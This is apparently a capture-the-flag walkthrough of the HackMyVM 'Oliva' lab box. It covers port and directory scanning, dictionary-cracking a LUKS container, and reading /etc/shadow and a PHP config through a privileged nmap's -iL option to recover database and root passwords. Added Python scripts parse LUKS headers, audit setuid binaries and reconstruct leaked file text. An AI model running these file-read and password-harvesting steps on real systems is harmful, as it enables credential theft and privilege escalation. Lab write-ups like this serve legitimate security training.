HackMyVM-Oliva box walkthrough
城南花已开

Information gathering

```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:b1:a2:c3 (Unknown)
192.168.56.113 08:00:27:f2:63:91 (Unknown) ### this one is the target

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.841 seconds (139.05 hosts/sec). 3 responded
```

Service detection

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.113
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 02:06 EDT
Nmap scan report for 192.168.56.113
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)
|_ 256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)
80/tcp open http nginx 1.22.1 ### port 80 is open
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
MAC Address: 08:00:27:F2:63:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.56.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds
```

Visiting it in a browser shows only the default nginx welcome page.

Directory scan

So the next step is to brute-force directories.

```
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.113 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,jpg,zip,png,html,xml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.113
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,jpg,zip,png,html,xml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 615] # found index.php
Progress: 1742 / 1453508 (0.12%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1917 / 1453508 (0.13%) # I stopped the scan here
===============================================================
Finished
===============================================================
```

Visiting index.php shows a short message and a CLICK! link (`<a href="oliva">`, as the later read of the page source confirms) that downloads a file named oliva, so I grabbed it.

I copied it from the Windows host to Kali with scp:

```
C:\Users\Administrator.PRIMARY>scp C:\Users\Administrator.PRIMARY\Downloads\oliva [email protected]:/home/kali/
```

```
┌──(kali㉿kali)-[~]
└─$ file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
```

I didn't know what LUKS was, so I asked ChatGPT to explain it:

LUKS (Linux Unified Key Setup) is the Linux disk-encryption standard used to protect data on storage devices such as hard disks and USB drives. It encrypts the device so that anyone without the key cannot easily read the data stored on it.


Kali ships a brute-force tool for LUKS containers, bruteforce-luks. It is slow: at under three passphrases per second, the first 970 rockyou entries alone took about five and a half minutes. It eventually recovered the password bebita:

```
❯ bruteforce-luks -t 4 -f /usr/share/wordlists/rockyou.txt -v 10 oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
Tried passwords: 970
Tried passwords per second: 2.878338
Last tried password: imissyou

Password found: bebita
```
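Why is the rate so low, and what exactly did `file` read out of the container? The answer is in the LUKS2 header: a 4096-byte binary header (magic, version, checksum algorithm, salt, UUID) followed by a JSON area at offset 0x1000 that describes the keyslots, including the passphrase KDF and its cost parameters. Every candidate passphrase has to go through that KDF, which is what caps bruteforce-luks at roughly 2.9 tries per second. The script below is an added example (not code from the writeup or from cryptsetup): it assembles a minimal LUKS2 header in memory so it runs without a disk image, then parses it back the way `file` does and verifies the header checksum. The UUID is the one `file` printed above; the salt, keyslot area, config and KDF parameters are made up for illustration. On a real container, `cryptsetup luksDump oliva` prints the same keyslot information.

```python
"""Parse and check a LUKS2 header, the structure `file oliva` summarised above.

Constructed example: build_header() assembles a minimal LUKS2 header
(4096-byte binary header followed by the JSON area) in memory; the keyslot,
config and KDF values inside it are made up for illustration.
parse_header() decodes it like `file` does and verifies the sha256 checksum.
"""
import hashlib
import json
import struct

LUKS2_MAGIC = b"LUKS\xba\xbe"      # the secondary header uses b"SKUL\xba\xbe"
BIN_HDR_SIZE = 4096                 # JSON area starts at 0x1000 ("at 0x1000" in `file`)
CSUM_OFFSET, CSUM_LEN = 448, 64

# struct luks2_hdr_disk: all integers big-endian, 512 bytes used, rest padding
HDR = struct.Struct(">6sHQQ48s32s64s40s48sQ184s64s")


def _pack(hdr_size, salt, uuid, csum):
    fixed = HDR.pack(LUKS2_MAGIC, 2, hdr_size, 1, b"", b"sha256", salt,
                     uuid.encode(), b"", 0, b"", csum)
    return fixed.ljust(BIN_HDR_SIZE, b"\0")


def build_header(kdf, uuid, hdr_size=16384, salt=bytes(range(64))):
    """Return binary header + JSON area with a valid checksum (constructed data)."""
    meta = {
        "keyslots": {"0": {
            "type": "luks2", "key_size": 64,
            "af": {"type": "luks1", "stripes": 4000, "hash": "sha256"},
            "area": {"type": "raw", "offset": "32768", "size": "258048",
                     "encryption": "aes-xts-plain64", "key_size": 64},
            "kdf": kdf}},
        "tokens": {}, "segments": {}, "digests": {},
        "config": {"json_size": str(hdr_size - BIN_HDR_SIZE),
                   "keyslots_size": "16744448"},
    }
    json_area = json.dumps(meta).encode().ljust(hdr_size - BIN_HDR_SIZE, b"\0")
    # checksum = sha256(binary header with csum zeroed || JSON area), zero-padded to 64
    digest = hashlib.sha256(_pack(hdr_size, salt, uuid, b"\0" * CSUM_LEN) + json_area).digest()
    return _pack(hdr_size, salt, uuid, digest.ljust(CSUM_LEN, b"\0")) + json_area


def parse_header(blob):
    """Decode the fields `file` prints; raise ValueError on bad magic or checksum."""
    (magic, version, hdr_size, _seqid, _label, csum_alg, salt, uuid,
     _subsys, _hdr_off, _pad, csum) = HDR.unpack_from(blob, 0)
    if magic != LUKS2_MAGIC or version != 2:
        raise ValueError("not a LUKS2 primary header")
    alg = csum_alg.rstrip(b"\0").decode()
    json_area = blob[BIN_HDR_SIZE:hdr_size]
    zeroed = bytearray(blob[:BIN_HDR_SIZE])
    zeroed[CSUM_OFFSET:CSUM_OFFSET + CSUM_LEN] = b"\0" * CSUM_LEN
    want = hashlib.new(alg, bytes(zeroed) + json_area).digest()
    if csum[:len(want)] != want:
        raise ValueError("header checksum mismatch: corrupted or tampered header")
    meta = json.loads(json_area.rstrip(b"\0"))
    return {"version": version, "hdr_size": hdr_size, "checksum_alg": alg,
            "salt_prefix": salt[:8].hex(), "uuid": uuid.rstrip(b"\0").decode(),
            "keyslots": meta["keyslots"]}


def kdf_summary(hdr):
    """One line per keyslot naming the PBKDF and its cost parameters; these
    are what limit a dictionary attack to a few passphrases per second."""
    lines = []
    for slot, ks in hdr["keyslots"].items():
        kdf = ks["kdf"]
        if kdf["type"].startswith("argon2"):
            lines.append(f"slot {slot}: {kdf['type']} time={kdf['time']} "
                         f"memory={kdf['memory']}KiB cpus={kdf['cpus']}")
        else:
            lines.append(f"slot {slot}: {kdf['type']} hash={kdf['hash']} "
                         f"iterations={kdf['iterations']}")
    return lines


if __name__ == "__main__":
    # UUID from the `file` output above; the argon2id cost values are made up
    img = build_header({"type": "argon2id", "time": 4, "memory": 1048576,
                        "cpus": 4, "salt": "c2FsdA=="},
                       "9a391896-2dd5-4f2c-84cf-1ba6e4e0577e")
    h = parse_header(img)
    print(h["uuid"], h["checksum_alg"], h["hdr_size"])
    print("\n".join(kdf_summary(h)))
```

The checksum check matters for forensics as much as for attack: a container whose header fails verification has been damaged or edited, and cryptsetup will refuse it until the backup header at the end of the header area is used instead.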

Reference: "Linux上使用cryptsetup对磁盘、U盘等设备进行加密/解密" (Encrypting and decrypting disks, USB drives and other devices with cryptsetup on Linux) | SmartDeng

Open the container with the recovered passphrase and mount it; mypass.txt holds the next password:

```
sudo cryptsetup luksOpen oliva test
Enter passphrase for oliva:
No key available with this passphrase.    # first attempt mistyped; the second one opens the container
Enter passphrase for oliva:
❯ mount /dev/mapper/test /mnt
mount: /mnt: must be superuser to use mount.
dmesg(1) may have more information after failed mount system call.
sudo mount /dev/mapper/test /mnt
ls -al /mnt
total 18
drwxr-xr-x 3 root root 1024 Jul 4 2023 .
drwxr-xr-x 23 root root 4096 Dec 10 19:39 ..
drwx------ 2 root root 12288 Jul 4 2023 lost+found
-rw-r--r-- 1 root root 16 Jul 4 2023 mypass.txt
cat /mnt/mypass.txt
Yesthatsmypass!
```

User flag

SSH in as oliva with that password and read user.txt:

```
oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm
```

Root privilege escalation

Information gathering

I uploaded linpeas.sh; it showed a MySQL/MariaDB instance listening on localhost only:

```
oliva@oliva:~$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
```

So I looked for a MySQL/MariaDB configuration file that might contain database credentials.

I also noticed that nmap on the box can be used to read arbitrary files: it runs with enough privilege to open root-only files, and its `-iL <file>` option (read targets from a file) echoes every entry it cannot parse as a host back in an error message.

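Two mechanisms let a normally unprivileged tool like nmap open /etc/shadow: a setuid-root bit, or a file capability such as cap_dac_read_search. The screenshots that showed which one applied on Oliva are not reproduced in this text, so the audit below is the general check rather than a record of the box. It is an added example, not code from the writeup: decode_vfs_caps() parses the raw `security.capability` extended attribute (struct vfs_cap_data) itself, so it works even where getcap is not installed, and find_file_readers() walks the usual binary directories (the default paths are an assumption) for anything that qualifies.

```python
"""Find binaries that can read root-only files: setuid root, or an effective
DAC-bypass file capability. Added example; decodes security.capability
xattrs directly instead of relying on getcap.
"""
import os
import stat
import struct

CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]
VFS_CAP_FLAGS_EFFECTIVE = 0x000001        # low byte of magic_etc
# Capabilities that bypass file read permission checks outright
FILE_READ_CAPS = {"CAP_DAC_READ_SEARCH", "CAP_DAC_OVERRIDE"}


def _cap_names(mask):
    return {CAP_NAMES[i] if i < len(CAP_NAMES) else f"CAP_{i}"
            for i in range(64) if mask >> i & 1}


def decode_vfs_caps(blob):
    """Decode a security.capability xattr (little-endian struct vfs_cap_data).
    Revision 2 is 20 bytes: magic_etc, then {permitted, inheritable} for the
    low and high 32 bits. Revision 3 appends a 4-byte rootid (user namespaces)."""
    if len(blob) < 20:
        raise ValueError("security.capability xattr too short")
    magic_etc, p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<5I", blob, 0)
    revision = magic_etc >> 24
    rootid = struct.unpack_from("<I", blob, 20)[0] if revision == 3 and len(blob) >= 24 else 0
    return {
        "revision": revision,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": _cap_names(p_lo | p_hi << 32),
        "inheritable": _cap_names(i_lo | i_hi << 32),
        "rootid": rootid,
    }


def audit_binary(path):
    """Setuid/setgid bits, owner and decoded file capabilities for one path."""
    st = os.stat(path)
    caps = None
    getxattr = getattr(os, "getxattr", None)    # Linux only
    if getxattr is not None:
        try:
            caps = decode_vfs_caps(getxattr(path, "security.capability"))
        except OSError:                          # ENODATA: no file capabilities
            pass
    return {"path": path, "owner_uid": st.st_uid,
            "setuid": bool(st.st_mode & stat.S_ISUID),
            "setgid": bool(st.st_mode & stat.S_ISGID), "caps": caps}


def can_read_any_file(report):
    """True when the binary runs as root (setuid root) or carries an effective
    DAC-bypass capability. A +p-only capability (effective flag clear) only
    helps a capability-aware program that raises it itself."""
    if report["setuid"] and report["owner_uid"] == 0:
        return True
    caps = report["caps"]
    return bool(caps and caps["effective"] and caps["permitted"] & FILE_READ_CAPS)


def find_file_readers(roots=("/usr/bin", "/usr/sbin", "/usr/lib", "/opt")):
    """Walk the usual binary directories (assumed paths) and return matching reports."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                try:
                    rep = audit_binary(path)
                except OSError:
                    continue
                if can_read_any_file(rep):
                    hits.append(rep)
    return hits


if __name__ == "__main__":
    for rep in find_file_readers():
        how = "setuid root" if rep["setuid"] else sorted(rep["caps"]["permitted"])
        print(rep["path"], how)
```

Any hit in that list that also accepts a file path on its command line (nmap's `-iL`, but equally tar, vim, python, or anything with an include/config option) is a file-read primitive for every local user, which is why setuid bits and file capabilities on general-purpose tools deserve a ticket rather than a shrug.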

First attempt: read /etc/shadow through nmap and crack the user hashes. Note the `$y$` prefix: these are yescrypt hashes (the Debian 12 default), which are deliberately slow to compute, so a wordlist run against them takes a long time.

```
oliva@oliva:~$ /usr/bin/nmap -iL /etc/shadow
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-14 17:45 CEST
Failed to resolve "root:$y$j9T$mJZXSkk0PjMpjwgunTu3a.$xlW8pdbOdxHdqCatq072mj3qQ69To4Gy6WbRwSbY6S3:19542:0:99999:7:::".
Failed to resolve "daemon:*:19542:0:99999:7:::".
Failed to resolve "bin:*:19542:0:99999:7:::".
Failed to resolve "sys:*:19542:0:99999:7:::".
Failed to resolve "sync:*:19542:0:99999:7:::".
Failed to resolve "games:*:19542:0:99999:7:::".
Failed to resolve "man:*:19542:0:99999:7:::".
Failed to resolve "lp:*:19542:0:99999:7:::".
Failed to resolve "mail:*:19542:0:99999:7:::".
Failed to resolve "news:*:19542:0:99999:7:::".
Failed to resolve "uucp:*:19542:0:99999:7:::".
Failed to resolve "proxy:*:19542:0:99999:7:::".
Failed to resolve "www-data:*:19542:0:99999:7:::".
Failed to resolve "backup:*:19542:0:99999:7:::".
Failed to resolve "list:*:19542:0:99999:7:::".
Failed to resolve "irc:*:19542:0:99999:7:::".
Failed to resolve "_apt:*:19542:0:99999:7:::".
Failed to resolve "nobody:*:19542:0:99999:7:::".
Failed to resolve "systemd-network:!*:19542::::::".
Failed to resolve "systemd-timesync:!*:19542::::::".
Failed to resolve "messagebus:!:19542::::::".
Failed to resolve "sshd:!:19542::::::".
Unable to split netmask from target expression: "oliva:$y$j9T$pud/moDgqqEeyht8CXkZE/$6EY/SqVpTsaEnPKnCxbsdCi8ImRvV86ip0LWF.8.vhD:19542:0:99999:7:::"
Failed to resolve "mysql:!:19542::::::".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.04 seconds
```

Well, that took too long; I couldn't crack it.

From other people's writeups I learned that the MySQL password is hidden in index.php, a file only www-data can read.

Reading it with nmap gives the password Savingmypass:

```
oliva@oliva:/var/www/html$ /usr/bin/nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-14 17:59 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
```
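The output above is readable by eye, but for longer files it is worth turning nmap's error lines back into text automatically, and worth knowing the two ways the leak is lossy: nmap splits the input on any whitespace (so line breaks are gone), and any token that does parse as a hostname, IP or CIDR range is scanned instead of echoed, so such words simply vanish. The script below is an added example, not code from the writeup; its sample input is constructed from the index.php output shown above, and the two message formats it recognises are the ones nmap 7.93 printed here.

```python
"""Turn the error output of `nmap -iL <file>` back into the file's contents.

Added example. nmap treats each whitespace-separated token of the -iL file
as a target and prints the ones it cannot parse back verbatim; SAMPLE_OUTPUT
is constructed from the index.php read shown in the writeup.
"""
import re

# nmap 7.9x messages that quote the offending token verbatim
ECHO_PATTERNS = (
    re.compile(r'^Failed to resolve "(.*)"\.$'),
    re.compile(r'^Unable to split netmask from target expression: "(.*)"$'),
)

SAMPLE_OUTPUT = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-14 17:59 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
"""


def leaked_tokens(output):
    """Return the file tokens in order, skipping nmap's own banner lines."""
    tokens = []
    for line in output.splitlines():
        for pat in ECHO_PATTERNS:
            m = pat.match(line)
            if m:
                tokens.append(m.group(1))
                break
    return tokens


def reconstruct(output):
    """Best-effort file text. Line breaks are lost (nmap splits on any
    whitespace) and tokens that parse as a host, IP or CIDR are scanned rather
    than echoed, so they are missing. Files with one space-free entry per
    line, such as /etc/shadow, come back intact apart from the line breaks."""
    return " ".join(leaked_tokens(output))


def php_string_vars(text):
    """Pull `$name = 'value';` assignments out of recovered PHP source."""
    return dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", text))


if __name__ == "__main__":
    text = reconstruct(SAMPLE_OUTPUT)
    print(text)
    print(php_string_vars(text))
```

For shadow files the same function returns one `user:hash:...` entry per token, ready to be fed to a cracker; the `Unable to split netmask` variant appears whenever a token contains a `/`, which yescrypt hashes often do.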

SSH login

Logging into MariaDB as root with that password turns up the root password OhItwasEasy!. No wonder brute-forcing the shadow hash was never going to finish quickly.

```
oliva@oliva:/var/www/html$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.11.3-MariaDB-1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| easy |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0,011 sec)

MariaDB [(none)]> use easy
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [easy]> show tables ;
+----------------+
| Tables_in_easy |
+----------------+
| logging |
+----------------+
1 row in set (0,000 sec)
MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz |
+--------+------+--------------+
| 1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,009 sec)
```

Ha, as expected the flag file has been renamed, so you can't simply read it through nmap. I had also wanted to read the SSH private key, but .ssh turned out to be empty too.

```
oliva@oliva:/var/www/html$ su root
Contraseña:                     # password prompt (Spanish locale)
root@oliva:/var/www/html# cd ~
root@oliva:~# ls -al
total 32
drwx------ 4 root root 4096 jul 4 2023 .
drwxr-xr-x 18 root root 4096 jul 4 2023 ..
lrwxrwxrwx 1 root root 9 jul 4 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 jul 4 2023 .local
-rw------- 1 root root 567 jul 4 2023 .mysql_history
-rw-r--r-- 1 root root 161 jul 9 2019 .profile
-rw------- 1 root root 24 jul 4 2023 rutflag.txt
drwx------ 2 root root 4096 jul 4 2023 .ssh
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7
```